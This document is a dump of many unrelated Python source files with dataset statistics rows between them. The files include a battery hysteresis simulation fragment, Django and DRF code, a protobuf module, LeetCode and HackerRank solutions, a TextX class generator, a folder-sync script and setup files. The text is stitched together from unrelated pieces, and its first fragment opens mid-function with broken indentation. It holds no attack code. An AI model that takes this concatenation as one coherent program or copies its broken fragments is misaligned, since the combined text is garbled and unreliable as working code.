current_in = 0
            # The Pulsar schedule overrides the manual if/elif profile above.
            current_in = pull.calculate(t[i])
init_ekf = (t[i] <= 1)
if init_ekf:
hys.init(0.0)
# Models
soc = min(max(soc + current_in / 100. * dt / 20000., 0.), 1.)
voc_stat = 13. + (soc - 0.5)
hys.calculate_hys(ib=current_in, voc_stat=voc_stat, soc=soc)
hys.update(dt=dt)
# Plot stuff
current_in_s.append(current_in)
hys.save(t[i])
# Data
print('hys: ', str(hys))
# Plots
n_fig = 0
fig_files = []
date_time = datetime.now().strftime("%Y-%m-%dT%H-%M-%S")
filename = sys.argv[0].split('/')[-1]
plot_title = filename + ' ' + date_time
n_fig, fig_files = overall(hys.saved, filename, fig_files, plot_title=plot_title, n_fig=n_fig, ref=current_in_s)
plt.show()
main()
| 35.191176
| 120
| 0.531446
| 5,374
| 0.561429
| 0
| 0
| 0
| 0
| 0
| 0
| 1,878
| 0.196197
|
b1bbb7e85fba153d58638741ce35332ddf59f2bb
| 127
|
py
|
Python
|
blog/home/urls.py
|
11059/blog
|
bd3a68b4a032c24da5831aefd33f358284ca4c3d
|
[
"MIT"
] | null | null | null |
blog/home/urls.py
|
11059/blog
|
bd3a68b4a032c24da5831aefd33f358284ca4c3d
|
[
"MIT"
] | null | null | null |
blog/home/urls.py
|
11059/blog
|
bd3a68b4a032c24da5831aefd33f358284ca4c3d
|
[
"MIT"
] | null | null | null |
from django.urls import path
from home.views import IndexView
urlpatterns=[
path('', IndexView.as_view(),name='index'),
]
| 18.142857
| 47
| 0.724409
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 9
| 0.070866
|
b1bbf9e9296a7bbda869b9c7e588aab147399325
| 1,507
|
py
|
Python
|
groundstation/proto/object_list_pb2.py
|
richo/groundstation
|
7ed48dd355051ee6b71164fc801e3893c09d11db
|
[
"MIT"
] | 26
|
2015-06-18T20:17:07.000Z
|
2019-09-26T09:55:35.000Z
|
groundstation/proto/object_list_pb2.py
|
richo/groundstation
|
7ed48dd355051ee6b71164fc801e3893c09d11db
|
[
"MIT"
] | null | null | null |
groundstation/proto/object_list_pb2.py
|
richo/groundstation
|
7ed48dd355051ee6b71164fc801e3893c09d11db
|
[
"MIT"
] | 5
|
2015-07-20T01:52:47.000Z
|
2017-01-08T09:54:07.000Z
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: groundstation/proto/object_list.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
DESCRIPTOR = _descriptor.FileDescriptor(
name='groundstation/proto/object_list.proto',
package='',
serialized_pb='\n%groundstation/proto/object_list.proto\" \n\nObjectList\x12\x12\n\nobjectname\x18\x01 \x03(\t')
_OBJECTLIST = _descriptor.Descriptor(
name='ObjectList',
full_name='ObjectList',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='objectname', full_name='ObjectList.objectname', index=0,
number=1, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=41,
serialized_end=73,
)
DESCRIPTOR.message_types_by_name['ObjectList'] = _OBJECTLIST
class ObjectList(_message.Message):
__metaclass__ = _reflection.GeneratedProtocolMessageType
DESCRIPTOR = _OBJECTLIST
# @@protoc_insertion_point(class_scope:ObjectList)
# @@protoc_insertion_point(module_scope)
| 25.982759
| 114
| 0.760451
| 175
| 0.116125
| 0
| 0
| 0
| 0
| 0
| 0
| 439
| 0.291307
|
b1bc9799f169be42f1deb800510f1f294b2fb871
| 3,822
|
py
|
Python
|
src/google.com/get_website.py
|
IRE-Project/Data-Collector
|
9ca3efc32afe068682d334c8f833cb97ff2af36d
|
[
"MIT"
] | null | null | null |
src/google.com/get_website.py
|
IRE-Project/Data-Collector
|
9ca3efc32afe068682d334c8f833cb97ff2af36d
|
[
"MIT"
] | null | null | null |
src/google.com/get_website.py
|
IRE-Project/Data-Collector
|
9ca3efc32afe068682d334c8f833cb97ff2af36d
|
[
"MIT"
] | null | null | null |
"""@file
This file is responsible for extracting website from google search results and formatting them for later use.
"""
import json
from urllib.parse import urlparse
import nltk
import os
tc = 0
cp = 0
def find_website(raw_data):
"""
Uses several rule based techniques to find candidate websites for a company
:param raw_data:
:return: list of candidate websites
"""
if raw_data["context"] != []:
print(raw_data["context"])
website = set()
removed_tokens = ["ltd", "ltd.", "co", "co.", "limited", "services", "private", "govt", "government", "industries"
,"incorporation", "public", "pvt", "and", "&"]
c_name = [tok for tok in raw_data["query"].lower().strip().split() if tok not in removed_tokens]
for ele in raw_data["top_urls"]:
try:
domain = urlparse(ele["url"]).netloc
if "official" in ele["description"] and "website" in ele["description"]:
website.add(domain)
else:
abbreviation = "".join([tok[0] for tok in c_name])
webname = domain.split(".")
if len(webname) < 2:
continue
elif len(webname) == 2:
webname = webname[0]
else:
if webname[1] == "co":
webname = webname[0]
else:
webname = webname[1]
if nltk.edit_distance(webname, abbreviation) <= 2:
website.add(domain)
elif any((tok in domain) and (len(tok) > 4) for tok in c_name):
website.add(domain)
except Exception as e:
print(str(e), ele)
if len(website) > 0:
global tc, cp
cp += 1
tc += len(website)
# if len(website) > 1:
# print(c_name, website)
return list(website)
def get_websites(raw):
"""
get all candidate websites for all search results in raw
:param raw: google search results
:return: dict with company name and candidate websites
"""
count = 0
data = {}
for key,val in raw.items():
data[key] = {
"Company": val["query"],
"website": find_website(val)
}
count += 1
print(f"\rProgress: {count}", end="")
return data
def reformat(data, links):
"""
Reformat data to better suit the global data paradigm
:param data: unformatted data
:param links: the exhaustive linkslist used
:return: the formatted data
"""
rev_map = {}
for ele in links["data"]:
rev_map[ele[1].lower().strip()] = ele[0]
new_data = {}
for key, val in data.items():
cin = rev_map[val["Company"].lower().strip()]
new_data[cin] = val["website"]
print(len(new_data))
return new_data
def get_all_websites(dir_path):
"""
Get all websites for all files in a directory
:param dir_path: path to directory
:return: dict of unformatted comany names and candidate websites
"""
data = {}
for file_name in os.listdir(dir_path):
if file_name.endswith(".json") and file_name != "final_data.json":
file = open(dir_path + file_name)
raw = json.load(file)
file.close()
websites = get_websites(raw)
for key, val in websites.items():
data[key] = val
return data
if __name__ == "__main__":
data = get_all_websites("../../data/google.com/")
print("\n", cp, tc)
file = open("../../data/zaubacorp.com/linkslist.json")
links = json.load(file)
file.close()
data = reformat(data, links)
file = open("../../data/google.com/final_data.json", "w+")
json.dump(data, file, indent=4)
file.close()
| 27.695652
| 118
| 0.554422
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,272
| 0.33281
|
b1bd684c676eed6c1630b156d59e20baabdf47e4
| 212
|
py
|
Python
|
easy/43_set_union_op.py
|
UltiRequiem/hacker-rank-python
|
bcc6a467dd2a1f90cf61c1d6b049f566f5ffabe1
|
[
"MIT"
] | 4
|
2021-08-02T21:34:38.000Z
|
2021-09-24T03:26:33.000Z
|
easy/43_set_union_op.py
|
UltiRequiem/hacker-rank-python
|
bcc6a467dd2a1f90cf61c1d6b049f566f5ffabe1
|
[
"MIT"
] | null | null | null |
easy/43_set_union_op.py
|
UltiRequiem/hacker-rank-python
|
bcc6a467dd2a1f90cf61c1d6b049f566f5ffabe1
|
[
"MIT"
] | 3
|
2021-08-02T21:34:39.000Z
|
2021-08-02T21:37:16.000Z
|
from functools import reduce as rd
def main() -> int:
return len(
rd(lambda a, b: a | b, [set(input().strip().split()) for j in range(4)][1::2])
)
if __name__ == "__main__":
print(main())
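# Example (illustrative input; the counts on the 1st and 3rd lines are read but unused):
#   4
#   1 2 3 9
#   2
#   3 8
# main() returns 5, the size of the union {1, 2, 3, 8, 9}.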
| 17.666667
| 86
| 0.561321
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 10
| 0.04717
|
b1c12120eb1970800352a4b0dd3d40166babaf18
| 2,354
|
py
|
Python
|
api/serializers.py
|
openjobs-cinfo/openjobs-api
|
b902d41fc20167727bd058a77906ddb9a83fd52f
|
[
"MIT"
] | null | null | null |
api/serializers.py
|
openjobs-cinfo/openjobs-api
|
b902d41fc20167727bd058a77906ddb9a83fd52f
|
[
"MIT"
] | null | null | null |
api/serializers.py
|
openjobs-cinfo/openjobs-api
|
b902d41fc20167727bd058a77906ddb9a83fd52f
|
[
"MIT"
] | null | null | null |
from rest_framework.serializers import ModelSerializer
from .models import Degree, Job, Skill, DataOrigin, Address, Qualification, User
class DegreeSerializer(ModelSerializer):
class Meta:
model = Degree
fields = ('id', 'name', 'description')
class AddressSerializer(ModelSerializer):
class Meta:
model = Address
fields = ('id', 'zip_code', 'country', 'state', 'city', 'street', 'street_number')
class QualificationSerializer(ModelSerializer):
class Meta:
model = Qualification
fields = ('id', 'name', 'description', 'degree_id')
class SkillRelationSerializer(ModelSerializer):
class Meta:
model = Skill
fields = ('id', 'name', 'color')
class DataOriginSerializer(ModelSerializer):
class Meta:
model = DataOrigin
fields = ('id', 'name', 'url')
class DataOriginRelationSerializer(ModelSerializer):
class Meta:
model = DataOrigin
fields = ('id', 'name')
class JobSerializer(ModelSerializer):
skills = SkillRelationSerializer(many=True, read_only=True)
origin_id = DataOriginRelationSerializer(read_only=True)
class Meta:
model = Job
fields = (
'id', 'original_id', 'url', 'number', 'title', 'state', 'created_at', 'closed_at', 'description',
'location', 'origin_id', 'skills'
)
class SkillSerializer(ModelSerializer):
class Meta:
model = Skill
fields = ('id', 'original_id', 'url', 'name', 'color', 'description', 'origin_id')
class UserSerializer(ModelSerializer):
skills = SkillRelationSerializer(many=True, read_only=True)
qualifications = QualificationSerializer(many=True, read_only=True)
class Meta:
ref_name = 'User'
model = User
fields = ('id', 'email', 'name', 'avatar_url', 'address_id', 'birth_date', 'skills', 'qualifications')
class UserCreationSerializer(ModelSerializer):
class Meta:
ref_name = 'UserCreation'
model = User
fields = (
'id', 'email', 'name', 'password', 'avatar_url', 'address_id', 'birth_date', 'skills', 'qualifications'
)
def create(self, validated_data):
instance = super().create(validated_data)
instance.set_password(validated_data['password'])
instance.save()
return instance
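# Usage sketch (standard DRF pattern; variable names are illustrative):
#   JobSerializer(job_instance).data          # nested dict incl. 'skills' and 'origin_id'
#   creator = UserCreationSerializer(data=payload)
#   if creator.is_valid():
#       user = creator.save()                 # calls create() above, which hashes the password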
| 28.707317
| 115
| 0.643161
| 2,188
| 0.929482
| 0
| 0
| 0
| 0
| 0
| 0
| 520
| 0.220901
|
b1c1b0752a916c3d0a0607d4658e6692c2c8187f
| 506
|
py
|
Python
|
naive_program.py
|
silentShadow/Python-3.5
|
acbbbc88826d9168ef2af29ca465930256f67332
|
[
"MIT"
] | null | null | null |
naive_program.py
|
silentShadow/Python-3.5
|
acbbbc88826d9168ef2af29ca465930256f67332
|
[
"MIT"
] | null | null | null |
naive_program.py
|
silentShadow/Python-3.5
|
acbbbc88826d9168ef2af29ca465930256f67332
|
[
"MIT"
] | null | null | null |
import urllib.request
urls = [ "https://www.google.com","httpr://www.python.org" ]
for link in urls:
request = urllib.request.Request( link)
response = urllib.request.urlopen( request)
'''
action here
'''
'''\
NORMAL: sloooow
[][][] [][] [][]{}{} {}{}{} {}{}{} {}
THREADING: still sloow
google: [] [] [] [][] [][][][] []
python: {}{}{} {} {}{} {} {}{}
ASYNCIO: Event Loop: fastest
[] {} [] {} [] {} {}{}{} [][][] {}{} [][]
'''
| 23
| 60
| 0.420949
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 345
| 0.681818
|
b1c3d6bce2bd16b269bea21fd537024f6377ca87
| 779
|
py
|
Python
|
utils/management/commands/report_utils/msg_counts.py
|
tperrier/mwachx
|
94616659dc29843e661b2ecc9a2e7f1d4e81b5a4
|
[
"Apache-2.0"
] | 3
|
2015-05-27T14:35:49.000Z
|
2016-02-26T21:04:32.000Z
|
utils/management/commands/report_utils/msg_counts.py
|
tperrier/mwachx
|
94616659dc29843e661b2ecc9a2e7f1d4e81b5a4
|
[
"Apache-2.0"
] | 375
|
2015-01-31T10:08:34.000Z
|
2021-06-10T19:44:21.000Z
|
utils/management/commands/report_utils/msg_counts.py
|
tperrier/mwachx
|
94616659dc29843e661b2ecc9a2e7f1d4e81b5a4
|
[
"Apache-2.0"
] | 6
|
2016-01-10T19:52:41.000Z
|
2020-06-15T22:07:24.000Z
|
import collections
from django.db import models
import contacts.models as cont
def print_report(parser):
parser.print_header('Message Counts By Auto Tag')
system_msgs = cont.Message.objects.filter(is_system=True).exclude(auto='')
groups = system_msgs.order_by().values('auto').annotate(count=models.Count('id'))
auto_counts = collections.defaultdict(list)
for g in groups:
split = g['auto'].split('.')
auto_group = (split[0],int(split[-1]))
auto_counts[auto_group].append(g)
    for auto_group, sub_groups in sorted(auto_counts.items()):
        print('{0[0]}.{0[1]} -- ({1})'.format(auto_group, sum(g['count'] for g in sub_groups)))
        for auto in sub_groups:
            print("\t{0[auto]} -- ({0[count]})".format(auto))
| 29.961538
| 93
| 0.653402
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 109
| 0.139923
|
b1c3f31c631276e9ba4df0e85896052a590bb06f
| 942
|
py
|
Python
|
leetcode/medium/137-Single_number_II.py
|
shubhamoli/practice
|
5a24fdeb6e5f43b821ef0510fe3b343ddda18f22
|
[
"MIT"
] | 1
|
2020-02-25T10:32:27.000Z
|
2020-02-25T10:32:27.000Z
|
leetcode/medium/137-Single_number_II.py
|
shubhamoli/practice
|
5a24fdeb6e5f43b821ef0510fe3b343ddda18f22
|
[
"MIT"
] | null | null | null |
leetcode/medium/137-Single_number_II.py
|
shubhamoli/practice
|
5a24fdeb6e5f43b821ef0510fe3b343ddda18f22
|
[
"MIT"
] | null | null | null |
"""
Leetcode #137
"""
from typing import List
from collections import Counter
class Solution:
# linear but extra memory
def singleNumber(self, nums: List[int]) -> int:
if not nums:
return None
# O(n) operation
store = Counter(nums)
for i in nums:
if store[i] == 1:
return i
return None
def singleNumber_NO_SPACE(self, nums: List[int]) -> int:
if not nums:
return None
        ones = 0
        twos = 0
for i in nums:
ones = (~twos) & (ones ^ i)
twos = (~ones) & (twos ^ i)
return ones
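# How the O(1)-space version works: `ones` keeps the bits whose count so far is 1 mod 3
# and `twos` the bits whose count is 2 mod 3; a bit seen a third time is cleared from
# both, so after the loop `ones` holds exactly the number that appears once.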
if __name__ == "__main__":
solution = Solution()
assert solution.singleNumber([2,2,3,2]) == 3
assert solution.singleNumber([0,1,0,1,0,1,99]) == 99
assert solution.singleNumber_NO_SPACE([2,2,3,2]) == 3
assert solution.singleNumber_NO_SPACE([0,1,0,1,0,1,99]) == 99
| 19.625
| 65
| 0.541401
| 567
| 0.601911
| 0
| 0
| 0
| 0
| 0
| 0
| 76
| 0.080679
|
b1c431a1f0a698ee3cb88df0ac882e928a41cf16
| 1,133
|
py
|
Python
|
CS303/lab4-6/work/algorithm_ncs/ncs_client.py
|
Wycers/Codelib
|
86d83787aa577b8f2d66b5410e73102411c45e46
|
[
"MIT"
] | 22
|
2018-08-07T06:55:10.000Z
|
2021-06-12T02:12:19.000Z
|
CS303_Artifical-Intelligence/NCS/algorithm_ncs/ncs_client.py
|
Eveneko/SUSTech-Courses
|
0420873110e91e8d13e6e85a974f1856e01d28d6
|
[
"MIT"
] | 28
|
2020-03-04T23:47:22.000Z
|
2022-02-26T18:50:00.000Z
|
CS303/lab4-6/work/algorithm_ncs/ncs_client.py
|
Wycers/Codelib
|
86d83787aa577b8f2d66b5410e73102411c45e46
|
[
"MIT"
] | 4
|
2019-11-09T15:41:26.000Z
|
2021-10-10T08:56:57.000Z
|
import json
from algorithm_ncs import ncs_c as ncs
import argparse
parser = argparse.ArgumentParser(description="This is a NCS solver")
parser.add_argument("-c", "--config", default="algorithm_ncs/parameter.json", type=str, help="a json file that contains parameter")
parser.add_argument("-d", "--data", default="6", type=int, help="the problem dataset that need to be solved")
args = parser.parse_args()
"""
how to use it?
example:
python3 -m algorithm_ncs.ncs_client -d 12 -c algorithm_ncs/parameter.json
good luck!
"""
if __name__ == '__main__':
config_file = args.config
p = args.data
with open(config_file) as file:
try:
ncs_para = json.loads(file.read())
except:
raise Exception("not a json format file")
_lambda = ncs_para["lambda"]
r = ncs_para["r"]
epoch = ncs_para["epoch"]
    n = ncs_para["n"]
ncs_para = ncs.NCS_CParameter(tmax=300000, lambda_exp=_lambda, r=r, epoch=epoch, N=n)
print("************ start problem %d **********" % p)
ncs_c = ncs.NCS_C(ncs_para, p)
ncs_res = ncs_c.loop(quiet=False, seeds=0)
print(ncs_res)
| 29.815789
| 131
| 0.655781
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 384
| 0.338923
|
b1c525fad1b20ec7dd22a4699a9e0a34d0093f34
| 1,999
|
py
|
Python
|
src/setup.py
|
umedoblock/fugou
|
45d95f20bba6f85764fb686081098d92fc8cdb20
|
[
"BSD-3-Clause"
] | null | null | null |
src/setup.py
|
umedoblock/fugou
|
45d95f20bba6f85764fb686081098d92fc8cdb20
|
[
"BSD-3-Clause"
] | 2
|
2018-11-25T12:06:08.000Z
|
2018-12-05T14:37:59.000Z
|
src/setup.py
|
umedoblock/fugou
|
45d95f20bba6f85764fb686081098d92fc8cdb20
|
[
"BSD-3-Clause"
] | null | null | null |
# name
# name of the package short string (1)
# version
# version of this release short string (1)(2)
# author
# package author’s name short string (3)
# author_email
# email address of the package author email address (3)
# maintainer
# package maintainer’s name short string (3)
# maintainer_email
# email address of the package maintainer email address (3)
# url
# home page for the package URL (1)
# description
# short, summary description of the package short string
# long_description
# longer description of the package long string (5)
# download_url
# location where the package may be downloaded URL (4)
# classifiers
# a list of classifiers list of strings (4)
# platforms
# a list of platforms list of strings
# license
# license for the package short string (6)
from distutils.core import setup, Extension
import sys
# print('sys.argv =', sys.argv)
# print('type(sys.argv) =', type(sys.argv))
if '--pg' in sys.argv:
suffix = '_pg'
sys.argv.remove('--pg')
else:
suffix = ''
# print('suffix =', suffix)
ext_name = '_par2' + suffix
module_par2 = \
Extension(ext_name, sources=[
'par2/par2/pypar2.c',
'par2/par2/libpar2.c'
],
)
ext_name = '_gcdext' + suffix
module_gcdext = \
Extension(ext_name, sources = ['ecc/ecc/_gcdext.c'],
)
ext_name = '_montgomery' + suffix
module_montgomery = \
Extension(ext_name, sources = ['montgomery/pymontgomery.c'])
ext_name = '_camellia' + suffix
module_camellia = \
Extension(ext_name, sources = ['camellia/pycamellia.c',
'camellia/camellia.c',
'libfugou.c'])
setup( name = 'fugou',
version = '8.0',
author = '梅濁酒(umedoblock)',
author_email = 'umedoblock@gmail.com',
url = 'empty',
description = 'This is a gcdext() package',
ext_modules = [
module_montgomery, module_gcdext, module_camellia
])
| 27.763889
| 64
| 0.630815
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,198
| 0.596317
|
b1c59e2da37dca10b24d9fc1fc1c500ca912a5d8
| 339
|
py
|
Python
|
setup.py
|
elcolumbio/cctable
|
798c46a833cb861d9e80cc52ab81cfc859c19d5e
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
elcolumbio/cctable
|
798c46a833cb861d9e80cc52ab81cfc859c19d5e
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
elcolumbio/cctable
|
798c46a833cb861d9e80cc52ab81cfc859c19d5e
|
[
"Apache-2.0"
] | null | null | null |
from setuptools import setup
setup(name='cctable',
version='0.3',
description='Frontend visualizing accouting data.',
url='github.com/elcolumbio/cctable',
author='Florian Benkö',
author_email='f.benkoe@innotrade24.de',
license='Apache License, Version 2.0 (the "License")',
packages=['cctable'])
| 30.818182
| 60
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 178
| 0.523529
|
b1c8b03e6d7fe1d0aa211ed21f9c71de064b475d
| 2,685
|
py
|
Python
|
scoff/misc/textx.py
|
brunosmmm/scoff
|
e1a0b5f98dd9e60f41f3f7cfcda9038ffd80e138
|
[
"MIT"
] | null | null | null |
scoff/misc/textx.py
|
brunosmmm/scoff
|
e1a0b5f98dd9e60f41f3f7cfcda9038ffd80e138
|
[
"MIT"
] | 1
|
2020-03-20T13:57:52.000Z
|
2021-03-11T17:25:25.000Z
|
scoff/misc/textx.py
|
brunosmmm/scoff
|
e1a0b5f98dd9e60f41f3f7cfcda9038ffd80e138
|
[
"MIT"
] | null | null | null |
"""Auto-generate custom TextX AST classes."""
import re
try:
import black
except ImportError:
black = None
GRAMMAR_RULE_REGEX = re.compile(
r"([a-zA-Z_]\w*)\s*:(((['\"];['\"])|[^;])+);", re.S
)
RULE_MEMBER_REGEX = re.compile(
r"([a-zA-Z_]\w*)\s*([?\+\*]?)=\s*([^\s]+)", re.S
)
if black is not None:
BLACK_FILE_MODE = black.FileMode(line_length=79)
def parse_textx_rule(rule_definition):
"""Parse a rule definition."""
members = re.findall(RULE_MEMBER_REGEX, rule_definition)
# shortcut to optional members
revised_members = []
for member in members:
name, operator, value = member
if value.endswith("?"):
operator = "?"
revised_members.append((name, operator, value))
return [(member[0], member[1]) for member in revised_members]
def parse_textx_grammar(grammar_file):
"""Parse grammar file."""
with open(grammar_file, "r") as f:
contents = f.read()
rules = re.findall(GRAMMAR_RULE_REGEX, contents)
grammar_rules = {}
for rule in rules:
rule_name = rule[0]
rule_body = rule[1]
rule_members = parse_textx_rule(rule_body.strip())
if len(rule_members) < 1:
continue
grammar_rules[rule_name.strip()] = rule_members
return grammar_rules
def build_python_class_text(class_name, subclass_of, *members):
"""Build python class declaration."""
member_arguments = []
optional_arguments = []
for member in members:
member_name, member_operator = member
if member_operator in ("?", "*"):
# optional
optional_arguments.append("{name}=None".format(name=member_name))
else:
member_arguments.append(member_name)
member_arguments.extend(optional_arguments)
class_contents = """
class {name}({parent_class}):
\"\"\"{name} AST.\"\"\"
__slots__ = ({slots})
def __init__(self, parent, {members}, **kwargs):
\"\"\"Initialize.\"\"\"
super().__init__(parent=parent, {member_assign}, **kwargs)
""".format(
name=class_name,
parent_class=subclass_of,
members=", ".join(member_arguments),
slots=", ".join(
[
'"{}"'.format(member[0])
for member in members
if member != "parent"
]
),
member_assign=", ".join(
["{name}={name}".format(name=member[0]) for member in members]
),
)
if black is not None:
return (
class_name,
black.format_str(class_contents, mode=BLACK_FILE_MODE),
)
else:
return (class_name, class_contents)
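# Worked example (hedged; the rule body is illustrative):
#   parse_textx_rule("name=ID value=INT note?=STRING")
# returns [('name', ''), ('value', ''), ('note', '?')]; passing those members to
# build_python_class_text('MyRule', 'AstNode', *members) yields ('MyRule', <source for a
# slotted MyRule(AstNode) class whose optional 'note' argument defaults to None>).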
| 27.680412
| 77
| 0.587337
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 580
| 0.216015
|
b1c9b912939d5da977a0f0ba07c635174c5f0f28
| 683
|
py
|
Python
|
scripts/runTests.py
|
RDFLib/pymicrodata
|
a4e2d82d092316f0742902227664bf691be6c17f
|
[
"W3C-20150513"
] | 25
|
2015-01-30T13:35:32.000Z
|
2021-12-29T18:42:35.000Z
|
scripts/runTests.py
|
RDFLib/pymicrodata
|
a4e2d82d092316f0742902227664bf691be6c17f
|
[
"W3C-20150513"
] | 7
|
2016-01-23T18:01:01.000Z
|
2020-12-22T16:27:38.000Z
|
scripts/runTests.py
|
RDFLib/pymicrodata
|
a4e2d82d092316f0742902227664bf691be6c17f
|
[
"W3C-20150513"
] | 4
|
2016-04-30T23:37:56.000Z
|
2019-03-24T20:56:32.000Z
|
#!/usr/bin/env python
"""
Run the microdata testing locally
"""
# You may want to adapt this to your environment...
import sys
sys.path.append("..")
import glob
from pyMicrodata import pyMicrodata
from rdflib import Graph
###########################################
# marshall all test HTML files
test_path = "../tests/"
test_html_files = glob.glob(test_path + "*.html")
# create the testing object
processor = pyMicrodata()
# for each HTML file...
for f in test_html_files:
print("trying {}".format(f))
g1 = Graph().parse(data=processor.rdf_from_source(f), format="turtle")
g2 = Graph().parse(f.replace("html", "ttl"), format="turtle")
assert g1.isomorphic(g2)
| 24.392857
| 74
| 0.657394
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 297
| 0.434846
|
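The assertion in the test loop above compares each generated graph against its expected Turtle file up to RDF graph isomorphism; a tiny standalone sketch of that check (not part of the test script, with made-up data):

from rdflib import Graph

ttl_generated = """
@prefix ex: <http://example.org/> .
ex:alice ex:knows ex:bob .
"""
ttl_expected = """
@prefix p: <http://example.org/> .
p:alice p:knows p:bob .
"""
g1 = Graph().parse(data=ttl_generated, format="turtle")
g2 = Graph().parse(data=ttl_expected, format="turtle")
assert g1.isomorphic(g2)  # identical triples, so the graphs match despite different prefixes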
b1ca7d47ebdd386eeb55838e16468d553751ab0a
| 2,910
|
py
|
Python
|
DeleteBackupFiles/deletebackupfile.py
|
Liuzkai/PythonScript
|
fb21ad80e085f6390ae970b81404f7e5c7923f4e
|
[
"MIT"
] | 1
|
2021-01-16T16:09:33.000Z
|
2021-01-16T16:09:33.000Z
|
DeleteBackupFiles/deletebackupfile.py
|
Liuzkai/PythonScript
|
fb21ad80e085f6390ae970b81404f7e5c7923f4e
|
[
"MIT"
] | null | null | null |
DeleteBackupFiles/deletebackupfile.py
|
Liuzkai/PythonScript
|
fb21ad80e085f6390ae970b81404f7e5c7923f4e
|
[
"MIT"
] | 1
|
2021-01-16T16:09:36.000Z
|
2021-01-16T16:09:36.000Z
|
# -*- coding: utf-8 -*-
# https://oldj.net/
u"""
同步两个文件夹
用法:
python syncdir.py source_dir target_dir
执行后,source_dir 中的文件将被同步到 target_dir 中
这个同步是单向的,即只将 source_dir 中更新或新增的文件拷到 target_dir 中,
如果某个文件在 source_dir 中不存在而在 target_dir 中存在,本程序不会删除那个文件,
也不会将其拷贝到 source_dir 中
判断文件是否更新的方法是比较文件最后修改时间以及文件大小是否一致
"""
import os
import sys
import shutil
def errExit(msg):
print("-" * 50)
print("ERROR:")
print(msg)
sys.exit(1)
def main(source_dir, target_dir):
print("synchronize '%s' >> '%s'..." % (source_dir, target_dir))
print("=" * 50)
sync_file_count = 0
sync_file_size = 0
for root, dirs, files in os.walk(source_dir):
if "backup" not in root and ".git" not in root:
relative_path = root.replace(source_dir, "")
            if len(relative_path) > 0 and relative_path[:1] in ("/", "\\"):
                relative_path = relative_path[1:]
            dist_path = os.path.join(target_dir, relative_path)
            if not os.path.isdir(dist_path):
os.makedirs(dist_path)
last_copy_folder = ""
for fn0 in files:
fn = os.path.join(root, fn0)
fn2 = os.path.join(dist_path, fn0)
is_copy = False
if not os.path.isfile(fn2):
is_copy = True
else:
statinfo = os.stat(fn)
statinfo2 = os.stat(fn2)
is_copy = (
round(statinfo.st_mtime, 3) != round(statinfo2.st_mtime, 3)
or statinfo.st_size != statinfo2.st_size
)
if is_copy:
if dist_path != last_copy_folder:
print("[ %s ]" % dist_path)
last_copy_folder = dist_path
print("copying '%s' ..." % fn0)
shutil.copy2(fn, fn2)
sync_file_count += 1
sync_file_size += os.stat(fn).st_size
if sync_file_count > 0:
print("-" * 50)
print("%d files synchronized!" % sync_file_count)
if sync_file_size > 0:
print("%d bytes." % sync_file_size)
print("done!")
if __name__ == "__main__":
# if len(sys.argv) != 3:
# if "-h" in sys.argv or "--help" in sys.argv:
# print(__doc__)
# sys.exit(1)
# errExit(u"invalid arguments!")
# source_dir, target_dir = sys.argv[1:]
# if not os.path.isdir(source_dir):
# errExit(u"'%s' is not a folder!" % source_dir)
# elif not os.path.isdir(target_dir):
# errExit(u"'%s' is not a folder!" % target_dir)
source_dir = "D:\\UGit\\HoudiniDigitalAssetSet"
target_dir = "D:\\NExTWorkSpace\\ArkWorkSpace\\Projects\\Ark2019\\Trunk\\UE4NEXT_Stable\\Engine\\Binaries\\ThirdParty\\Houdini\\HoudiniDigitalAssetSet"
main(source_dir, target_dir)
| 30.957447
| 155
| 0.55189
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,234
| 0.391995
|
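The copy decision in the script above rests on comparing the rounded st_mtime and st_size of the two copies, which only stays stable across runs because shutil.copy2 preserves modification times. A small standalone sketch of that predicate (the helper name needs_copy is made up for illustration):

import os
import shutil

def needs_copy(src, dst):
    """Return True when dst is missing or differs from src in mtime or size."""
    if not os.path.isfile(dst):
        return True
    a, b = os.stat(src), os.stat(dst)
    return (round(a.st_mtime, 3) != round(b.st_mtime, 3)
            or a.st_size != b.st_size)

# shutil.copy2 preserves timestamps, so a freshly copied file reports as in sync:
#     shutil.copy2("a.txt", "b.txt"); assert not needs_copy("a.txt", "b.txt")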
b1cc39d59dda967c7dcf371addd5df5990b99e23
| 5,004
|
py
|
Python
|
enkube/util.py
|
rfairburn/enkube-1
|
47910bbcc05a40a5b32c97d44aab9ca5c7038ed0
|
[
"Apache-2.0"
] | null | null | null |
enkube/util.py
|
rfairburn/enkube-1
|
47910bbcc05a40a5b32c97d44aab9ca5c7038ed0
|
[
"Apache-2.0"
] | 2
|
2019-12-03T20:05:03.000Z
|
2021-09-30T17:37:45.000Z
|
enkube/util.py
|
rfairburn/enkube-1
|
47910bbcc05a40a5b32c97d44aab9ca5c7038ed0
|
[
"Apache-2.0"
] | 1
|
2019-12-03T19:23:05.000Z
|
2019-12-03T19:23:05.000Z
|
# Copyright 2018 SpiderOak, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import json
